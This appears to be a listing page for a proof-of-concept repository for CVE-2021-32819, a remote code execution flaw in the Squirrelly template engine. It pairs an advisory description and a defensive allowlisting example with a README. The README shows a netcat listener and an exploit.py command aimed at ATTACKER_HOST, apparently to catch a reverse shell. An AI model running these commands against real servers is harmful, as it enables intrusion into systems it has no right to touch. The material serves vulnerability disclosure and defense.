CVE-2021-32819 PoC: Squirrelly Information Disclosure Vulnerability

Source
Associated Vulnerability
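Title: Squirrelly Information Disclosure Vulnerability (CVE-2021-32819)
Description: npm squirrelly is an application from the US company npm. It provides a modern, configurable, powerful and fast template engine implemented in JavaScript. Squirrelly has an information disclosure vulnerability that stems from mixing pure template data with engine configuration options through the Express render API. By overwriting internal configuration options, remote code execution can be triggered in downstream applications.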
Description
SquirrellyJS mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options, remote code execution may be triggered in downstream applications.
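
The mitigation side of the issue described above, as an added example that is not part of the PoC repository or the Squirrelly project: build the object passed to `res.render()` from an allowlist of view fields, so request-supplied keys never sit next to engine configuration options. The field names, limits and the `buildTemplateData` helper are assumptions for illustration.

```javascript
// Added example: allowlist what reaches the template engine.
// VIEW_FIELDS and buildTemplateData are hypothetical names, not a library API.

// Fields the view actually uses, each with a validator that returns the
// normalised value or undefined when the input is not acceptable.
const VIEW_FIELDS = {
  name: (v) => (typeof v === 'string' && v.length <= 64 ? v : undefined),
  page: (v) => {
    if (typeof v !== 'string' || !/^\d{1,4}$/.test(v)) return undefined;
    const n = Number.parseInt(v, 10);
    return n >= 1 ? n : undefined;
  },
};

// Build a fresh render context holding only allowlisted, validated fields.
// Every other key in the request-derived object is dropped and reported,
// including any key that would collide with an engine option.
function buildTemplateData(input, fields = VIEW_FIELDS) {
  const data = {};
  const rejected = [];
  const source = input !== null && typeof input === 'object' ? input : {};
  for (const key of Object.keys(source)) {
    const known = Object.prototype.hasOwnProperty.call(fields, key);
    const value = known ? fields[key](source[key]) : undefined;
    if (value === undefined) {
      rejected.push(key); // unknown key or failed validation
    } else {
      data[key] = value;
    }
  }
  return { data, rejected };
}

// Constructed sample: a parsed query object with two expected fields, one
// unexpected scalar key and one unexpected nested object.
const sampleQuery = { name: 'alice', page: '3', engineOption: 'x', settings: { a: 1 } };
const result = buildTemplateData(sampleQuery);
console.log(result.data);
console.log(result.rejected);

// In an Express handler (hypothetical route and view name):
//   const { data, rejected } = buildTemplateData(req.query);
//   if (rejected.length) console.warn('dropped render keys', rejected);
//   res.render('index', data); // never pass the raw request object
```

Logging the rejected keys gives a detection signal for requests that probe for engine options.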
Readme
# CVE-2021-32819
CVE-2021-32819 : SquirrellyJS mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options, remote code execution may be triggered in downstream applications.

### Source
https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/
### Analysis
https://blog.diefunction.io/vulnerabilities/ghsl-2021-023
### squirrelly
v8.0.0 >= v8.0.8 Remote Code Execution
### Environment
Ubuntu 20.04.1

### Example
```
nc -lvp 443

python3 exploit.py http://example.com/  ATTACKER_HOST 443
```

![Proof of concept](https://raw.githubusercontent.com/Abady0x/CVE-2021-32819/main/img/POC.png)
File Snapshot

[4.0K] /data/pocs/c59b8ca8881bae6749d4969678ca2dde870c76ef
├── [ 809] exploit.py
├── [4.0K] img
│   └── [ 58K] POC.png
└── [ 676] README.md

1 directory, 3 files